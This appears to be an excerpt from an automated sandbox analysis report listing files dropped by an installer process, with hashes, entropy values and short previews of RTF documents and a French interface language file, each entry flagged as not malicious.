                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):73792
                                                                                                                                                                                                                                                          Entropy (8bit):4.964676170455869
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4Ix1ELHT2njX8x3TLjwUtqYepAkVZEdvI9vtjP1KAn1+kxazy9qGZBwnzKul:qqJCFtjPmYeIA9/
                                                                                                                                                                                                                                                          MD5:248443A08A6A0A95E8F172FC20682550
                                                                                                                                                                                                                                                          SHA1:79F8FB1257C4686C4EE643E2FCCE5306D2C7F5BC
                                                                                                                                                                                                                                                          SHA-256:507932E99002CF707D5CBD4355955DB83A13C47C13DF7301E51FCE0BD4A1C75D
                                                                                                                                                                                                                                                          SHA-512:D6AF2CB284B942F818D9FD3949ACBD05A40D72E701B62432F64A7633E8550EDF2CC4F0C2973C784BC0AE6523E25F13729C933DB702C578050BE8BE4B9EC20E1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43992
                                                                                                                                                                                                                                                          Entropy (8bit):5.0490517908671535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsb5IjTF4BaVy3F1+1h1r1KDZ/6A9z:2amAhbwF4BaA3F1+1h1r1KDIA9z
                                                                                                                                                                                                                                                          MD5:093443BD0007A7BB28B50778BFB43E66
                                                                                                                                                                                                                                                          SHA1:7FC5599F85CEBDA23A323994A57590E14628C84C
                                                                                                                                                                                                                                                          SHA-256:2823645253E4999BA6ED5175DDA4B288C2D01916811294E0E538726BB43952CD
                                                                                                                                                                                                                                                          SHA-512:9A1BB1C996C3B0561B2F1C20D8FB12E3B98322961572803AFFDA7659E024840BA5FD04C53329A443F1C8DB1B16B89CD2E64CCE409AFDBED6139B21F08A65B3C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42930
                                                                                                                                                                                                                                                          Entropy (8bit):5.0450094413030575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy/4jfDCcJJrNgVVhGPNhHwGNjm+epnqyxz/BSKIasAzoBYcXumDpIyZ/6A97:qqraqpIA97
                                                                                                                                                                                                                                                          MD5:DBF71033F406A5C5C9AEA3EC2E669C28
                                                                                                                                                                                                                                                          SHA1:829479F385D2FFC9EFF81C2E3F3543289D64C1B9
                                                                                                                                                                                                                                                          SHA-256:452AA2D29FFC659EF8042B9933B8DD6A7A679E906371F3C5530E740ED0B8605F
                                                                                                                                                                                                                                                          SHA-512:B926A8072DBAF438AC4F1B920D4C7B4A1E16BCD371F904DB429927968D2DA1D4C3ED1517DD7E8D35604911623F86EB4F46A3ADDA56B27BAEB9DB6063CA51BF68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49574
                                                                                                                                                                                                                                                          Entropy (8bit):5.031691924230754
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:4qFys4jeDCcJ+r15g5V5V5h5G5P5N5hBcqtqYepn3/xXdQQMQs2YMKBX49nNbaEq:4qYo3CtU7c7KIA9m
                                                                                                                                                                                                                                                          MD5:AEE08B8B9A32D64F630D57580A2D4457
                                                                                                                                                                                                                                                          SHA1:0BD2511BF3C71E549858E1990A07CA29A11A9C8D
                                                                                                                                                                                                                                                          SHA-256:468D9AA761B58B6CCA9C93C271D3B9A3EC96D367019CA53F0579E3A5E87720FE
                                                                                                                                                                                                                                                          SHA-512:16CE81CF5D2A1910E845DC857AEC389ADB9E2A05E262DD47F4285A5BF5EE9A522622484EC9CE875089B1526B0C0A5956A66B858A6A731F33F2BDE6E1FE130A71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff-10\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66194
                                                                                                                                                                                                                                                          Entropy (8bit):4.972115474061052
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fkex1eiCUYvmpNM2UrPGsGx7TYlDidldgOQrrFlEoIeRWeWyWVWAWJHZIWRWe0:q4vsLIA9i
                                                                                                                                                                                                                                                          MD5:6181F9D5B81EC15F49F57FCFABF69562
                                                                                                                                                                                                                                                          SHA1:451D5FBDF90E8CD153DC5990092613901D084CD1
                                                                                                                                                                                                                                                          SHA-256:442E6A351381A56F912F0A68036C868F60D45117C92C9C2225948AC614DF7416
                                                                                                                                                                                                                                                          SHA-512:5F5C61E9995C9081CFC0F97E857B5D67E45A1A6FD0796927AE694E25E41A50129E1952B19CF9A40A325A23137732465A718B1282C23688093160A0FF604BB124
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):57638
                                                                                                                                                                                                                                                          Entropy (8bit):4.981099786389407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLVRMek4aEqkGBKugOLT7eQk8C/Pr+uPmB35LBUo22xt2VOz:q49OUnWkIA9U
                                                                                                                                                                                                                                                          MD5:DAEEF8D403213DE69003FA2BA7664B93
                                                                                                                                                                                                                                                          SHA1:4A5FE0EE5ACCA61948EDA61062B395F59E224E7F
                                                                                                                                                                                                                                                          SHA-256:635C6F72A6029595AF7922DF53835CE80BF486671E0BE4164D4612F03E993FF4
                                                                                                                                                                                                                                                          SHA-512:5DE410F9C6A4F4A27ED9F456DF9D0D79DF87A21125718CC9B6674B0A4ED686F0630B1BE86A30B787053C3380A24C844899C3CFAA9A4854E72DA803AD673AF92E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47296
                                                                                                                                                                                                                                                          Entropy (8bit):5.036767014333867
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy/4jfDCcJJrNgVVhGPNhHwGNjm+epnqExwaWxZqEUqCuj8QDe3n3g3/3Z3z3V:qqraqDIA9/
                                                                                                                                                                                                                                                          MD5:7984C74EC410F7A952EBBBB798A09143
                                                                                                                                                                                                                                                          SHA1:10E1E32861C86AA02C81D824CAEEB670DC2FD1F8
                                                                                                                                                                                                                                                          SHA-256:922B12112DE9715D7164050920AE36A5AA44FB3346DF447C6ADB5ADF36483F69
                                                                                                                                                                                                                                                          SHA-512:34B6C3E0E3FADC4AB057411FF42B6DEB01E3B70297A357358BC27E5A5A802D68B50BA01EB1DA42E922B00DA3C0F5E58330F9A751D496E107BBAE0FFC2E2B31BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44859
                                                                                                                                                                                                                                                          Entropy (8bit):5.042653911286004
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jfDCcJJrNgVVhGPNhHwGNjm+epnqdxBBdwwZxsAUtcGuermSShpHlfcXX:qqJ9aqMIA9Z
                                                                                                                                                                                                                                                          MD5:0692A56E310ADDB8AB518DFF420373E6
                                                                                                                                                                                                                                                          SHA1:1855B76BA5A77F96D7ED04FECD78342BB3902517
                                                                                                                                                                                                                                                          SHA-256:821D367CFEC38EEB7BFC2635ECC1B8938802D5D4071AFFA380BF5D3DA32BBA8A
                                                                                                                                                                                                                                                          SHA-512:FE0C99F78A2807F06ECE7E94CFD9EBAD74E65FE2E9A8619D1EB3FD9CA68FA1F80AEA29D7FE1CD0AA7CEC6DD0404070E99FBD1B14DE5409CAB94703B2C679083C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48084
                                                                                                                                                                                                                                                          Entropy (8bit):5.035611454104282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jfDCcJJrNgVVhGPNhHwGNjm+epnq/x7yjxNQwr8AUmQryuj8QDc3n3g3x:qqJ9aqbIA9b
                                                                                                                                                                                                                                                          MD5:EF57D23344C66880C6A38F743FD3FF0E
                                                                                                                                                                                                                                                          SHA1:FC336BCC92580A0D367CB5B3604EE0040CC08492
                                                                                                                                                                                                                                                          SHA-256:E36C9442648C0564C6AD9AC6074EC2B5023BBEBF291708977714AD977DDC1633
                                                                                                                                                                                                                                                          SHA-512:C336736ADD43033E4BEA538EDAD809127C1ECF80DA20FCD3E02065E310919529E44C5CF57D0FD24EA295FAE367BFE7F7C52465E18863D0B2AF37188EA069502F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42784
                                                                                                                                                                                                                                                          Entropy (8bit):5.040903024418766
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFkwx1eXCpMF2njX8x3JLjwUtqYepjRBcnjX8x3D5xoYAo79Q88T27Z/6A9I:qqRbnIA9I
                                                                                                                                                                                                                                                          MD5:6A4574B9B32C4BC5A6F9B7825A003942
                                                                                                                                                                                                                                                          SHA1:30BB8557175BD91B06453AA8017FA35754D870C6
                                                                                                                                                                                                                                                          SHA-256:6EB4E3BD1DDD9B08957F4B2EC49482EB8C6A083F812703F28A51EDD2E1B65DCB
                                                                                                                                                                                                                                                          SHA-512:2A220BD4DCE899F86CA79DB7F977362554CD80AB72BCC9EB24A28FA4D72B0F0A617655B76ACEEF6991273AA459CD1C7BF29FBB5EFE4C1E9C30CD900124E2BE81
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pano
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20359
                                                                                                                                                                                                                                                          Entropy (8bit):4.977393911384311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:Ui/yM5JVBb8Mc2MfcwNx0TiTtGNleNglf8sj1AzDqqSo:UFGYD+icNleNhcIGqd
                                                                                                                                                                                                                                                          MD5:3115ABE2CF8075BB08D1B7EA95180E7E
                                                                                                                                                                                                                                                          SHA1:752F7833223EDB298E903C9731E78A3109E026D3
                                                                                                                                                                                                                                                          SHA-256:156C2CDE62ABF6D9289B85054F707FA8777A722EC2DDBC0615544A216E633133
                                                                                                                                                                                                                                                          SHA-512:C5DE077A294349896E2D846808806AF67B9E29E7EC1358B763A8F66381F839983A4ADE4C751A8A36C84EE20E8ADD1E5F869759000F527284F4312D9803617BC3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Commencez"..tbStartHint="Activez le journal de bord"..tbStop="Arr.tez "..tbStopHint="D.sactivez le journal de bord"..tbFind="Trouvez"..tbFindHint="Recherchez des informations dans le journal de bord"..tbSetting="Param.tres"..tbSettingHint="Les param.tres du programme"..tbAbout=". propos"..tbAboutHint=". propos / informations de journal de bord"..tbHomePage="Page d'accueil"..tbHomePageHint="Allez . la page d'accueil du programme"..tbToday="Aujourd'hui"..tbTodayHint="Allez dans journal de bord d.aujourd'hui"..tbHide="Masquez"..tbHideHint="Le mode furtif (pas d'ic.ne dans la zone de notification)"..tbMinimize="Minimisez"..tbMinimizeHint="Minimisez au magasin"..tbExit="Quittez"..tbExitHint=" Quittez et arr.tez le jour
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44178
                                                                                                                                                                                                                                                          Entropy (8bit):5.050546012194347
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13ixj2HiBkyKWm+m2NjrOX/zJSYctuTZ4Y+2XrXZ3iE8f32HNzQf3IUBwkl2/j:VkeWY4TJ
                                                                                                                                                                                                                                                          MD5:8C6D29E2A257F91393950B5369539D50
                                                                                                                                                                                                                                                          SHA1:674B7489A1DDF7B46040AC571F3DACCEA00F0162
                                                                                                                                                                                                                                                          SHA-256:9A4326ABEFF7FEABB451943D15DC7CDD41DB433BE2A450BFF0C024E0302C6BA2
                                                                                                                                                                                                                                                          SHA-512:81E81D6E6920F9E3B5D601209CE5C79343EE95B4BED07C6788A30B8E48F337E8D73918291634E98644AA3BE96A6E171F9F610FD33EEDDB6B1D17DD9E1A25FA64
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
